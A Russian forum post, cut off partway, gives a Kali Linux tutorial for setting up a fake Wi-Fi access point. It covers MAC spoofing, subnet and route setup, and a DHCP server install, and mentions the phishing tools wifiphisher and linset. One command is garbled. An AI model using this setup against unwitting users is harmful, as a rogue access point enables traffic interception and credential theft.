Фейковая точка доступа

Тема в разделе "Анонимность в сети", создана пользователем Bombardir, 16 сен 2016.

  1. Bombardir

    Bombardir

    Сообщения:
    84
    Баллы:
    6
    Фейковая точка доступа является мощным инструментом в руках подкованного человека, и сейчас я хочу поделиться одним из способов ее создания. Я не являюсь специалистом в области каких либо информационных технологий, linux -ом начало пользоваться месяца 4 назад. Перед этим для создания фейка пробовал программы wifi phisher, linset и еще какая то утилита из набора airplay-ng, но ни одна из них не работала. Результат не получил, а желание осталось. И так приступим, что нам требуется:

    1. Kali linux
    2. Встроенная карта wifi
    3. Внешний usb-адаптер wifi ( у меня TL-WN722N)
    4. Ноутбук на котором все это будет установлено
    5. Рабочая сеть wifi к которой можно подключиться (открытая, закрытая похер)

    (Да, кстати, стандартный NetworkManager на Кали Линукс я заменил на wicd, он создавал проблемы для работы wifi карт в режиме master)

    Когда все собрали начинаем работать.
    Сперва подключаемся к любой сети wifi, затем открываем терминал и вводим команду (смотрим шлюз сети)

    $ ip r grep default

    у меня выдает default via 192.168.1.1 dev wlan0 (192.168.1.1 это искали). Далее втыкаем usb wifi адаптер, а в терминале набираем

    # ifconfig wlan1 hw ether aa:aa:aa:aa:aa:aa

    Этой командой меняем МАК адрес карты, хотя можно не менять. Подумаешь, засветится реальный мак вашей карты.
    Далее создаем новую подсеть

    # ifconfig wlan1 192.168.2.1 netmask 255.255.255.0 up

    Далее добавляем маршрут

    # ip r add 192.168.2.0 via 192.168.2.1

    Все, карта настроена, сеть создана. На следующем этапе устанавливаем DHCP сервер, кто не знает, это такая штука, которая в автоматическом режиме раздает ip адреса

    # apt-get install isc-dhcp-server

    Установилось, отлично, теперь настраиваем. Создаем конфигурационный файл в следующем каталоге /etc/dhcp/dhcpd.conf